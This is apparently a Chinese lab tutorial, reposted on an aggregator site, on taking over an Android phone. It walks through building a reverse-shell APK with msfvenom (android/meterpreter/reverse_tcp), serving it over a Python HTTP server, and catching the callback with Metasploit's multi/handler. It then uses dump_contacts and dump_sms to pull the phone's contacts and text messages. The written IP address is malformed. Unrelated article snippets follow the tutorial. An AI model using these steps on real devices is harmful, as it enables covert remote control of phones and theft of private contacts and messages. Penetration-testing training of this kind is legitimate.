第二天-03-安卓手机的入侵实验

2023-11-06

安卓手机入侵实验

要求:

电脑主机与手机模拟器或者真机在当前环境下,网络是畅通的,相互之间可以进行通信。

如何进行测试网络环境:

我们首先需要确定IP。

linux通过终端命令 # ip a 或者 #ifconfig

windown下:win加r输入cmd调出终端,使用ipconfig查看ip地址。

kali下:

在这里插入图片描述

Android模拟器下:

在这里插入图片描述

在这里插入图片描述

在安卓真机下:打开wifi

在这里插入图片描述

操作:

知道IP后使用ping命令测试是否可以连通。

终端下命令:

​ ping 目标主机ip

在这里插入图片描述

测试步骤:

可以ping通后开始进行入侵测试:

  1. 使用msfvenom生成一个连接kali主机的apk安卓应用

lhost=192.168.1.10 (这是Kali的IP),lport=4444 (默认4444)端口,1.apk(生成apk的名字)

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.116.1354 lport=4444 R > 1.apk

在这里插入图片描述

home下点开test

apk安卓应用上传到安卓手机

步骤一:kali开启HTTP服务80端口

命令:

​ python3 -m http.server 80

在这里插入图片描述

​ 步骤二:安卓下通过ip访问网站下载

​ 模拟器下有bug可以通过

终端下命令:切换路径 cd /sdcard

开始下载 wget ip/apk文件

真机可以直接浏览器下输入ip地址访问

安卓下载安装完成并且给与程序权限

在这里插入图片描述

​ 3. 回到kali

​ 输入命令启动msfconsole

在这里插入图片描述

  1. 选择工具模块

    命令:

    use exploit/multi/handler

    在这里插入图片描述

    1. 设置攻击载荷

      set payload android/meterpreter/reverse_tcp

在这里插入图片描述

  1. 设置监听方ip地址(kali的IP地址)

    set LHOST ip

    在这里插入图片描述

  2. 设置端口

    set LPORT 4444

    在这里插入图片描述

  3. run运行

  4. 回到安卓点击安装的程序

  5. kali下可以执行操作了

    查看目标安卓手机通讯录:dump_contacts

    在这里插入图片描述

完成后的文件保存在home,目录下

​ 查看目标手机短信 :dump_sms

在这里插入图片描述

至此操作完成

补充:

可以使用help 查看命令帮助

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

第二天-03-安卓手机的入侵实验 的相关文章

随机推荐

  • 高光谱遥感图像处理(14)-----ENVI使用教程之监督分类与非监督分类

    监督分类 又称训练分类法 用被确认类别的样本像元去识别其他未知类别像元的过程 它是在分类之前通过目视判读和野外调查 对遥感图像上某些样区中影像地物的类别属性有了先验知识 对每一种类别选取一定数量的训练样本 计算机计算每种训练样区的统计或其他
  • Maven本地仓库位置设置和实际读取不正确问题

    今天发现自己的项目的maven本地仓库不是默认的位置 默认位置一般是 C Users 用户名 m2 repository 然后我在idea中 尝试变更 本地仓库位置 变更之后 发现读取的位置没有发现变化 不是自己这里设置的位置 后来发现 在
  • 3.1.2 Hive on Spark配置

    3 1 2 Hive on Spark配置 1 兼容性说明 注意 官网下载的Hive3 1 2和Spark3 0 0默认是不兼容的 因为Hive3 1 2支持的Spark版本是2 4 5 所以需要我们重新编译Hive3 1 2版本 编译步骤
  • 李开复:创业开始别想太高 年轻人多看国外网站

    新浪科技讯 10月30日下午消息 据多家台湾媒体报道 创新工场董事长兼首席执行官李开复今天在台湾参加 远见 第12届华人企业领袖远见高峰会 他指出 台湾创业环境没转好 建议台湾创业团队没必要一开始想太高 太大 应先解决用户的小问题 李开复去
  • Java 生成随机数全数字方式

    生成9位随机数字 System out println int Math random 9 1 100000000 生成8位随机数字 System out println int Math random 9 1 10000000 生成6位随
  • Visual Studio 2015/2017/2019 设置透明主题、个性背景(含异常解决方法)

    Visual Studio 2015 2017 2019主题设置 透明主题 个性背景 1 首先打开工具 gt 扩展与更新 分别下载和安装以下两个插件 如果出现下载或安装异常 可点击右上的详细信息单独下载安装 注 如果找不到moeide 可以
  • php7.4 安装xdebug3.1.3扩展

    一 检测需要的xdebug版本 使用网站 Xdebug Support Tailored Installation Instructions 可以参考这篇文章 phpStorm 安装使用xdebug断点调试流程 墨 眉 CSDN博客 得出我
  • C++参数传递

    C 参数传递 目录 C 参数传递 1 基本参数传递方式 按值传递 指针传递 引用传递 总结 2 指针与引用区别 3 参数为指针的指针或指针的引用 1 void func char a 2 void func1 char a 3 void f
  • Apache SSHD服务端:ssh2、sftp 登录验证超时时间、连接断开超时时间

    通过ssh2 sftp协议连接基于Apache MINA SSHD的服务时 长时间不用连接会自动断开 我们来看一下默认断开时间和如何修改断开时间 超时报错日志 Disconnecting ServerSessionImpl username
  • ubuntu 服务管理运行程序 sysv-rc-conf

    sysv rc conf是一个强大的服务管理程序 Ubuntu运行级别Linux 系统任何时候都运行在一个指定的运行级上 不同的运行级的程序和服务都不同 所要完成的工作和要达到的目的不同 系统可以在这些运行级之间进行切换 以完成不同的工作
  • socket包长度问题: send recieve(转载)

    一个包没有固定长度 以太网限制在46 1500字节 1500就是以太网的MTU 超过这个量 TCP会为IP数据报设置偏移量进行分片传输 现在一般可允许应用层设置8k NTFS系 的缓冲区 8k的数据由底层分片 而应用看来只是一次发送 win
  • C语言 标识符、合法常量、转义字符

    一 合法标识符 用户定义的合法标识符需满足以下两个要求 标识符只能由字母 数字和下划线组成 标识符不能以数字开头 二 合法常量 整型常量 十进制 10 八进制 017 以0开头 不能出现8 9 十六进制 0xA1 以0x开头 实型常量 强调
  • Mac安装python

    一 下载python 官网地址 https www python org downloads macos 目前主流版本应该是3 7 3 8 3 9 文章以3 8为例 作者已将下载包放到网盘 方便取用 网盘地址 https pan baidu
  • Ngrok 内网穿透

    一 配置Ngrok 准备内网穿透 1 到ngrok官网去注册一个号 国内也有一个sunny ngrok 但是我用来几次全部失败了 所以推荐国外的 网址是 https ngrok com 2 我注册的时候面临验证码刷不出来 所以建议直接用gi
  • MVB通讯机制

    MVB通信只能是主从式通信 主站配置调度表 轮询各从站 从站应答主站命令 采用广播式发送 MVB网络上其他节点过滤地接收网络上的信息 首发 待学习指导
  • elastic-job详解(一):数据分片

    数据分片的目的在于把一个任务分散到不同的机器上运行 既可以解决单机计算能力上限的问题 也能降低部分任务失败对整体系统的影响 elastic job并不直接提供数据处理的功能 框架只会将分片项分配至各个运行中的作业服务器 其实是Job实例 部
  • html表格怎么绑定数据类型,Excel中表格添加数据标签及设置格式的操作方法

    Excel图表以其直观的展示功能深受用户喜爱 但有些初学者对于生成图表后如何添加数据标签有所困扰 今天 学习啦小编就教大家在Excel中表格添加数据标签及设置格式的操作方法 Excel中表格添加数据标签及设置格式的操作步骤如下 1 在Exc
  • Google地图现可按照路况给出出行时间

    在 Google Maps 查询出行路线的时候 不管是公交还是自驾 它都会告诉你一个大概的全部行程需要的时间 不过如果你是在下午 5 点左右从北京出发的话 那个时间显然是痴人说梦 由于 Google Maps 本身在很多城市已经有了交通流量
  • 谷粒商城--整合Elasticsearch和商品的上架

    整合Elasticsearch和商品的上架 一 整合ES ES常用概念 索引 类型 文档是什么 倒排索引 相关度分数score的计算 安装ES和Kibana 快速安装 ES kibana 初步检索 cat ES的增删改查 新增文档 put新
  • 第二天-03-安卓手机的入侵实验

    安卓手机入侵实验 要求 电脑主机与手机模拟器或者真机在当前环境下 网络是畅通的 相互之间可以进行通信 如何进行测试网络环境 我们首先需要确定IP linux通过终端命令 ip a 或者 ifconfig windown下 win加r输入cm